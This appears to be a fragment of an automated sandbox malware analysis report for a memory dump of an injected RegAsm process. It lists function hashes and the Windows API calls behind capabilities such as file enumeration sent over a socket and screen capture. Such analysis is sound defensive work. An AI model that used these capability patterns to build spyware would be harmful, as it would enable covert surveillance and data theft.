                                  • Instruction ID: ce4fd747b54faa4bd7a1eeb3bcc1357c013179f80075dd4b8a2cbe4382d00d18
                                  • Opcode Fuzzy Hash: b71d05b3c7fe1d4ca99e8279e8949133a53b058c086b6bf9e28b218b471bedce
                                  • Instruction Fuzzy Hash: B0F02431E40318BBCB116F71EC02FAE7B65EF08B11F10012AFD05662A0DA75AE14D79E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3dc2aaa5ba629767c24c60991e20e51c41170b5e5616752661aee279650f1187
                                  • Instruction ID: 95a343e324232c7d98835ffcd34e263639f39472ec0b3937548a97988adb3f04
                                  • Opcode Fuzzy Hash: 3dc2aaa5ba629767c24c60991e20e51c41170b5e5616752661aee279650f1187
                                  • Instruction Fuzzy Hash: EA022D71E002199BDF14DFA9C8807AEFBF5EF88324F25826AD919E7344D734AD418B94
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00404D0E
                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00404DCE
                                    • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNextsend
                                  • String ID:
                                  • API String ID: 4113138495-0
                                  • Opcode ID: b7052913901af0115e8feff582df357ddef7403b4e3299c4d437fe83a43b6e7c
                                  • Instruction ID: 86d4ecdf3890dc42d56e92d70e3d1e8f32d6d22d1a4151bfebc482781cc436e9
                                  • Opcode Fuzzy Hash: b7052913901af0115e8feff582df357ddef7403b4e3299c4d437fe83a43b6e7c
                                  • Instruction Fuzzy Hash: 0C218171910118AACB04FBA1DC9ADEE7738AF51318F40017BF706771D1EF786A89CA99
                                  APIs
                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00445537,?,?,00000008,?,?,00449C9D,00000000), ref: 00445769
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID:
                                  • API String ID: 3997070919-0
                                  • Opcode ID: 57b167dff027822b40cd9bf0cc99b9618bd263b207ef16c4545e6c5eba121c6f
                                  • Instruction ID: d9807f6ae093f4c5904e94fcdbc25e2fc9976d51ca65457f1ed2f32b0d277757
                                  • Opcode Fuzzy Hash: 57b167dff027822b40cd9bf0cc99b9618bd263b207ef16c4545e6c5eba121c6f
                                  • Instruction Fuzzy Hash: F1B17F31510A08DFEB15CF28C486B657BE0FF45364F258659E89ACF3A2C739E992CB44
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042C3DF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: 4657d06232d56aef3570b1a27ce3a6ffe9e3c18176b919e5c76832e2b4ae0a01
                                  • Instruction ID: 2697a07927edba09fa4b120a04b7d5dd22db01720c8de2c3ab983906f36902a3
                                  • Opcode Fuzzy Hash: 4657d06232d56aef3570b1a27ce3a6ffe9e3c18176b919e5c76832e2b4ae0a01
                                  • Instruction Fuzzy Hash: CE519E71A012259BEF14CF69E9C16AEBBF4FB48314F65806AC815E7350E3789940CB65
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C673
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00444578
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                  • String ID:
                                  • API String ID: 1663032902-0
                                  • Opcode ID: fc2171e14334ea3e7d55d49ed6e0648b68154e3df0422f9748cdb8287be33ce6
                                  • Instruction ID: b26485aea30f030f9f54250f3ad1374887b22aef8311f1835d05ff9e541aa45f
                                  • Opcode Fuzzy Hash: fc2171e14334ea3e7d55d49ed6e0648b68154e3df0422f9748cdb8287be33ce6
                                  • Instruction Fuzzy Hash: CA217172900206BBEF249F25DC82BBB73A8EF85314F10417BEA01D6241EB799D55CB59
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                  • EnumSystemLocalesW.KERNEL32(004442D4,00000001,00000000,?,0043A13A,?,00444901,00000000,?,?,?), ref: 0044421E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID:
                                  • API String ID: 1084509184-0
                                  • Opcode ID: 711f43e458a69ee5f63f55250c80b62ac370d985356c8e9e332dbec9468b49f5
                                  • Instruction ID: e40f59eb0fa5de4c9f3a16e8b0591c3d531b47424b4bb394e983a0f53163e8a9
                                  • Opcode Fuzzy Hash: 711f43e458a69ee5f63f55250c80b62ac370d985356c8e9e332dbec9468b49f5
                                  • Instruction Fuzzy Hash: 1111253A2007059FEB189F79C8966BAB7A1FFC0399B14442EE98687B40D375B942CB44
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004444F2,00000000,00000000,?), ref: 00444780
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$InfoLocale_abort_free
                                  • String ID:
                                  • API String ID: 2692324296-0
                                  • Opcode ID: 849f1fabcbe4ac2e6b94c621ba7373402f76eb41b3920df2b534d741acd0084d
                                  • Instruction ID: 3707f94c9474d79ec8c8af264f29abd72a84bbcb21354a1b498b6705759ad170
                                  • Opcode Fuzzy Hash: 849f1fabcbe4ac2e6b94c621ba7373402f76eb41b3920df2b534d741acd0084d
                                  • Instruction Fuzzy Hash: 81F0F9369001157BFB245A658846BBB7798EB81768F15056AEC05A3240EB78BE42C6D4
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                  • EnumSystemLocalesW.KERNEL32(00444524,00000001,?,?,0043A13A,?,004448C5,0043A13A,?,?,?,?,?,0043A13A,?,?), ref: 00444293
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID:
                                  • API String ID: 1084509184-0
                                  • Opcode ID: b77e861aaf121e6850db94ffa8edcef269b7f7f26ea000de3514022ea6fb6281
                                  • Instruction ID: ed68b6acb7b79b841aa03ef9907d8241165ad6fda512d4fef2396eaa6fb624ec
                                  • Opcode Fuzzy Hash: b77e861aaf121e6850db94ffa8edcef269b7f7f26ea000de3514022ea6fb6281
                                  • Instruction Fuzzy Hash: 3FF022362003041FEB249F399882B7B7B94FFC03A8F05446EF9019B680D6B5AC01CA44
                                  APIs
                                    • Part of subcall function 0043AD2A: EnterCriticalSection.KERNEL32(-00465500,?,004386A9,00000000,004619A0,0000000C,00438664,00000000,?,?,0043AFC8,00000000,?,0043C6C9,00000001,00000364), ref: 0043AD39
                                  • EnumSystemLocalesW.KERNEL32(0043CE7F,00000001,00461B48,0000000C), ref: 0043CEFD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                  • String ID:
                                  • API String ID: 1272433827-0
                                  • Opcode ID: cc012cbae077de1091ac5ef2746fcd0995d3cc78f54d382beea4263f038d526b
                                  • Instruction ID: eba351e3cc4fa079fe98c46d05503de7d11671559dc86b79a4a0c9269dfae67b
                                  • Opcode Fuzzy Hash: cc012cbae077de1091ac5ef2746fcd0995d3cc78f54d382beea4263f038d526b
                                  • Instruction Fuzzy Hash: 84F09C71A60204EFDB10EF69D886B4D77F1EB48715F10502AF510DB1E1D7B949409F9E
                                  APIs
                                    • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                    • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                    • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                    • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                  • EnumSystemLocalesW.KERNEL32(004440B8,00000001,?,?,?,00444923,0043A13A,?,?,?,?,?,0043A13A,?,?,?), ref: 00444198
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID:
                                  • API String ID: 1084509184-0
                                  • Opcode ID: 857805ff5cfac31aa780aa4bfdb7f2fddcff3c9821c112fd3dce12a2e24e9f63
                                  • Instruction ID: 3940252ce8a352bd8bebd02a5c5d0b3aa0470f6d38ba7cac213a61fdd0367e1a
                                  • Opcode Fuzzy Hash: 857805ff5cfac31aa780aa4bfdb7f2fddcff3c9821c112fd3dce12a2e24e9f63
                                  • Instruction Fuzzy Hash: D2F0553A30020557DB049F35C849B6A7F90EFC2710F47005EEA058B290C23AA882C798
                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0040EF02,00467C58,004685A8,00467C58,00000000,00467C58,00000000,00467C58,5.2.0 Light), ref: 0040A7E7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
                                  • Instruction ID: 246ef45fcc1c43f14e643255eb9989aa517e7b2afcbfdbb0636345a12660214f
                                  • Opcode Fuzzy Hash: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
                                  • Instruction Fuzzy Hash: 14D05B3074011D77D51496859C0EEAA779CD702755F000166BE04D72C0D9E05E0057D1
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002C6D0,0042C1C4), ref: 0042C6C9
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: e4160cd21736b9b724a45f96a50e5b9c9ea1004a171853f735f238ca1bdafe9f
                                  • Instruction ID: e9757334f95d2b5005854ca62c29f3dcca458c893af1fbba705ce56ddbb622d7
                                  • Opcode Fuzzy Hash: e4160cd21736b9b724a45f96a50e5b9c9ea1004a171853f735f238ca1bdafe9f
                                  • Instruction Fuzzy Hash:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
                                  • Instruction ID: 30eacb981cb6278b9ede921612644d04ced7297ace774c55fa6f37c82e0ba73a
                                  • Opcode Fuzzy Hash: 00ef9a7d3e26296a65ddfeab7daadc8cf88223517f11c320cda8b7a0b82f5a53
                                  • Instruction Fuzzy Hash: 8B5176A060164777EF3CA92884567BF67999F0E304F1AF80FD9C2D7382C62C9D06861E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
                                  • Instruction ID: 621a70b502a6b5c6d37222a8ff5bbc931b0a3dc879fdfe3d88000f589cd0ccb1
                                  • Opcode Fuzzy Hash: c4e470230f592cf2ea01b95aa03d306a2ecdbbcafd652f7a80073b6ae47f5522
                                  • Instruction Fuzzy Hash: D551576060060B76DB34696884557BF67D89B0F344F1AF41FD882EB382C50DFD06975E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                  • Instruction ID: a32e6f4fee792168acabc3a99eaa4178362968a550f51f58417a862e767cbfd4
                                  • Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                  • Instruction Fuzzy Hash: B541D276D1061D9BCB04CFA9C5816DEFBF1FF88310F25816AE905B3350D379AA828B84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: W3@
                                  • API String ID: 0-335922567
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: a6e552f00ab565f691ebadb1e40a45b636efe887c5fa14ffde51f1c265891404
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: 74113677300071C396448A2FF4B82B7A78DEAC63207BC43F7D1438B758D12AE401952C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
                                  • Instruction ID: 728b4bcd2b28723637816e06e4881ec1bd9ce59320bf7fec46daf2244288b495
                                  • Opcode Fuzzy Hash: be7d55350c29dde4d9bf8e952ff0af0bb26ed02bc87ce8e620404103b0c57f2d
                                  • Instruction Fuzzy Hash: 6D322321D69F454DE7239638C862336A248EFB33C5F54C737E81AB5AA6EF29C4C34149
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
                                  • Instruction ID: 6584078b23f89aed32d62d9620e82e9003f0c038ea44ebf7209e3ce05309007b
                                  • Opcode Fuzzy Hash: 27ba41c287480f5b8183f811836f76d7f550f221e5fc56609452204e267aaea9
                                  • Instruction Fuzzy Hash: 09321921D29F414DE7239634D825336A648AFB73C9F16D737F819B5EAAEB28C4C34109
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 273094f8efc9c5ee53709d3987aae02e3c60b7ddbc8b4795d374de1f405ad226
                                  • Instruction ID: 06fb409b2eb98aa264058a924fa4ce0d35fc76914ffdd7f9b1cda4f708cda101
                                  • Opcode Fuzzy Hash: 273094f8efc9c5ee53709d3987aae02e3c60b7ddbc8b4795d374de1f405ad226
                                  • Instruction Fuzzy Hash: 2422C131A082199BDF15DF68C4807FEB7B5AF44314F18416BEC55AB382DB389E85CB98
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 093cffccdb6c66a0d7340a85fd8f8add5e90d94a679726dfc5632c4f1750100d
                                  • Instruction ID: 4ec5c20c67ca4022d545f9580ae9730a7cccf3cf0bf7266e2a21cc6c1313b906
                                  • Opcode Fuzzy Hash: 093cffccdb6c66a0d7340a85fd8f8add5e90d94a679726dfc5632c4f1750100d
                                  • Instruction Fuzzy Hash: 15127F36F002288BDB14DBE5E9566BDB3F2EF88314F2544AAD805F7381DA386D01DB94
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
                                  • Instruction ID: 178965d57fe9952de82b7b97e0f16105608be4409eb057888a0a3f3c60355087
                                  • Opcode Fuzzy Hash: c968e86ef4a24f4bac8ff0bd1e5c72ae7075c91140b07428d43092b41367d369
                                  • Instruction Fuzzy Hash: 79026D716006518FC318CF2EE89057AB7F1FB8D302745863AE495CB796DB34E926CB98
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction ID: 191d1750cc2476baf38904309f755c3ad6ad9953389e3caa19d10b1414658eb7
                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                  • Instruction Fuzzy Hash: 7CC197322050930ADF2D8679887413FFAE15EA67B171A276FD8B3CB2D4EF28D524D524
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aae66948a7d14490cd8c9109fbf7412b48e3904d3f2339df8b430768c5abf669
                                  • Instruction ID: 0abdb9aafc57bb68438a50acd3f2ecbd6e1049ece67ae85b0bc1d56911e8b7ce
                                  • Opcode Fuzzy Hash: aae66948a7d14490cd8c9109fbf7412b48e3904d3f2339df8b430768c5abf669
                                  • Instruction Fuzzy Hash: 51E16274A102688FCB08CF5DE8A18BE73F1FB49302745456EE582D7392CB35EA16DB94
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                  • Instruction ID: ee6c2d19268771462c9197f7b73242e64c44eb7a896abee3da5328890589ff8c
                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                  • Instruction Fuzzy Hash: 55C1D5322061930ADF2D867AC83413FBAE15E967B171A276FD4B3CB2D4EF18D524D624
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                  • Instruction ID: 4c33483144a6206e2481d487649dabb1675ca56e8a31ab94a4777204e3e8f2ea
                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                  • Instruction Fuzzy Hash: 29C1E73220609309DF2D8679C83013FFAE15AA67B171A2B6FD4B3CB2D4EF18D564D624
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                  • Instruction ID: a9be9406364418b117dfccb16ba3cbf4ac398d75b9daafeab1f7aac4f9d83a5b
                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                  • Instruction Fuzzy Hash: 28C1B53220619309DF2D8679C83413FFAE15AA57B171A275FD4B3CB2C4EF28E564D624
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b17c460b684e94a17c9e77f29893b7b1776442f60110699ece81c43363f330e7
                                  • Instruction ID: ba4722610437f29e61b715c0b74fc57c743cb2af62776873812a0077e47186ab
                                  • Opcode Fuzzy Hash: b17c460b684e94a17c9e77f29893b7b1776442f60110699ece81c43363f330e7
                                  • Instruction Fuzzy Hash: 99B1B4391146929ACB05EF24C0913F27BA1FF6A304F1850B9DC9CCFB56E3399516EB64
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
                                  • Instruction ID: 73028a218e6efc437b141c97914250212e1ee116e92d67fc33dd4042d6646766
                                  • Opcode Fuzzy Hash: 9d6a532daf8328cd9145a2a1080489925b78f33d54c9cc293e88b00a97174a33
                                  • Instruction Fuzzy Hash: 2E613B35E0060E9BDF08DFB9D4815EFB7B6FF8C310B10852AE816BB250D7746A498B94
                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00411D54
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00411D60
                                    • Part of subcall function 004121BD: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004121F1
                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411DCB
                                  • DeleteDC.GDI32(004595D0), ref: 00411DE3
                                  • DeleteDC.GDI32(00000000), ref: 00411DE6
                                  • DeleteObject.GDI32(?), ref: 00411DEA
                                  • SelectObject.GDI32(00000000,00000000), ref: 00411E07
                                  • DeleteDC.GDI32(004595D0), ref: 00411E1A
                                  • DeleteDC.GDI32(00000000), ref: 00411E1D
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,004595D0,00000000,00000000,?,?,00CC0020), ref: 00411E41
                                  • GetIconInfo.USER32(?,?), ref: 00411E70
                                  • DeleteObject.GDI32(?), ref: 00411E95
                                  • DeleteObject.GDI32(?), ref: 00411E9E
                                  • DrawIcon.USER32(?,00000000,00000000,?), ref: 00411EAD
                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00411ED8
                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00411EFB
                                  • LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000), ref: 00411F61
                                  • GlobalAlloc.KERNEL32(00000000,?,?,?,00000000), ref: 00411FCA
                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00411FEA
